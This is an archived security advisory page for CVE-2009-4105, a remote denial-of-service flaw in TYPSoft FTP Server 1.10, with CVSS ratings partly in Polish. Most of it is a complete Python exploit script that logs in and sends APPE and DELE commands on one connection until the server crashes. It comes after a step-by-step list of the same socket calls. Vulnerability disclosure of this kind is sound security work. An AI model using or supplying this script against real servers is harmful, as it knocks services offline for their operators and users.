TYPSoft FTP Server 1.10 Remote DoS Vulnerabilities

2009-11-30 / 2009-12-01
Credit: leinakesi
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-4105
CWE: CWE-20


Ogólna skala CVSS: 3.5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 6.8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Jednorazowa
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Częściowy

Date of Discovery: 24-Nov-2009 Credits:leinakesi[at]gmail.com Vendor: TYPSoft Affected: TYPSoft FTP Server Version 1.10 Earlier versions may also be affected Overview: TYPSoft FTP Server is an easy use FTP server Application. Denial of Service vulnerability exists in TYPSoft FTP Server when "APPE" and "DELE" commands are used in the same socket connection. Details: If you could log on the server successfully, take the following steps and the ftp server will crash which would lead to Denial of Service attack: 1.sock.connect((hostname, 21)) 2.sock.send("user %s\r\n" %username) 3.sock.send("pass %s\r\n" %passwd) 4.sock.send("PORT 127,0,0,1,122,107\r\n") 5.sock.send("APPE "+ test_string +"\r\n") 6.sock.send("DELE "+ test_string +"\r\n") 7.sock.close() Severity: High Exploit example: #!/usr/bin/python import socket import sys import time def Usage(): print ("Usage: ./expl.py <local_ip> <serv_ip> <Username> <password>\n") print ("Example:./expl.py 127.0.0.1 127.0.0.1 anonymous anonymous\n") print ("Example:./expl.py 192.168.48.183 192.168.48.111 anonymous anonymous\n") if len(sys.argv) <> 5: Usage() sys.exit(1) else: local=sys.argv[1] hostname=sys.argv[2] username=sys.argv[3] passwd=sys.argv[4] test_string="a"*30 ip_every=local.split('.') for i in range(1,10000): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((hostname, 21)) except: print ("Connection error!") sys.exit(1) r=sock.recv(1024) print "[+] "+ r sock.send("user %s\r\n" %username) print "[-] "+ ("user %s\r\n" %username) r=sock.recv(1024) print "[+] "+ r sock.send("pass %s\r\n" %passwd) print "[-] "+ ("pass %s\r\n" %passwd) r=sock.recv(1024) print "[+] "+ r sock_data.bind((local,31339)) sock_data.listen(1) sock.send("PORT " + ip_every[0] +","+ ip_every[1] +","+ ip_every[2] +"," + ip_every[3] + ",122,107\r\n") print "[-] "+ ("PORT " + local + "122,107\r\n") r=sock.recv(1024) print "[+] "+ r sock.send("APPE "+ test_string +"\r\n") print "[-] "+ ("APPE "+ test_string +"\r\n") r=sock.recv(1024) print "[+] "+ r sock.send("DELE "+ test_string +"\r\n") print "[-] "+ ("DELE "+ test_string +"\r\n") r=sock.recv(1024) print "[+] "+ r sock.close() sock_data.close() time.sleep(2) sys.exit(0);

Referencje:

http://xforce.iss.net/xforce/xfdb/54407
http://www.securitytracker.com/id?1023234
http://www.securityfocus.com/bid/37114
http://www.securityfocus.com/archive/1/archive/1/508048/100/0/threaded


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top